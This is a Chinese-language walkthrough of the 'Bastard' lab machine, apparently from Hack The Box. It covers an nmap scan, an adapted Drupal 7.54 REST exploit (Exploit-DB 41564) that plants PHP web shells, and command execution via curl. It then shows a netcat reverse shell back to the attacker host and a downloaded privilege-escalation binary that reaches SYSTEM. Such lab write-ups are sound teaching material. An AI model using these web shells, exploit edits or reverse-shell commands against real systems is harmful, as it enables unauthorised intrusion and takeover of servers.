环境介绍:
名称:Bastard
系统:Windows
信息搜集
1
2
3
4
5
6
|
$ sudo nmap -sV -O -F --version-light 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
|
-sV:探测开放端口以确定服务/版本信息
-O:启用OS检测
-F:快速模式 - 扫描比默认扫描更少的端口
–version-light:限制最可能的探针(强度2)
- 这里采用
nmap快速扫描,发现目标为Windows系统开放80、135、49154端口。
Web
- 发现是
Drupal 7.54,2017-02-01发布的。
漏洞枚举
漏洞搜集
漏洞分析
1
2
|
$ cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
pluma 41564.php
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
error_reporting(E_ALL);
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$url = 'http://10.10.10.9';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
$browser = new Browser($url . $endpoint_path)
|
- 可以看出来这个是一个SQL注入以及最终远程执行代码的漏洞,目录传参地址
/rest_endpoint,最终执行保存了一个ixuSOspsOUU.php文件,内容为PHP一句话木马。
- 而通过手工查找并未发现这个目录,所以我们需要找到这个地方,常规思路肯定是通过跑字典,这里我采用尝试的方式测试出来目录为
/rest。
修改EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'icekamsec.php',
'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
|
获得shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
$ php7.3 41564.php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/icekam.php
$ curl -v http://10.10.10.9/icekam.php
* Trying 10.10.10.9:80...
* TCP_NODELAY set
* Connected to 10.10.10.9 (10.10.10.9) port 80 (#0)
> GET /icekam.php HTTP/1.1
> Host: 10.10.10.9
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: Microsoft-IIS/7.5
< X-Powered-By: PHP/5.3.28
< X-Powered-By: ASP.NET
< Content-Length: 0
<
* Connection #0 to host 10.10.10.9 left intact
$ curl http://10.10.10.9/icekam.php\?cmd\=whoami
nt authority\iusr
|
*成功获得SHELL,发现是一个低权限帐号。
提权
信息搜集
*系统信息发现是Windows Server 2008 R2 Datacenter系统,18/3/2017,安装。
NC反弹
上传一句话
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
error_reporting(E_ALL);
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'icekamrec.php',
'data' => '<?php @eval($_POST[\'icekam\']);?>'
];
|
客户端监听
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
$ nc -lvp 12345
listening on [any] 12345 ...```
> * 本地开启NC监听。
#### 生成NC与反弹shell
```bash
$ cp /usr/share/windows-binaries/nc.exe .
$ curl http://10.10.10.9/icekamsec.php\?cmd\=nc.exe%2010.10.16.54%2012345%20-e%20cmd.exe
$ nc -lvp 12345
listening on [any] 12345 ...
10.10.10.9: inverse host lookup failed: Unknown host
connect to [10.10.16.54] from (UNKNOWN) [10.10.10.9] 49212
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
|
获得第一个flag
1
2
3
4
5
6
|
C:\Users\dimitris\Desktop>cd C:\Users\dimitris\Desktop
cd C:\Users\dimitris\Desktop
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06eb76a163d312f921a2
|
本地漏洞枚举
- 使用
Windows-Exploit-Suggester枚举漏洞。
flag
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
upload 41020.exe
[*] uploading : 41020.exe -> 41020.exe
meterpreter > shell
41020.exe
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
type user.txt.txt
C:\Users\Administrator\Desktop
type root.txt
- 使用
41020.exe进行提权,并获取到flag。
心得
比较常见的漏洞利用思路。
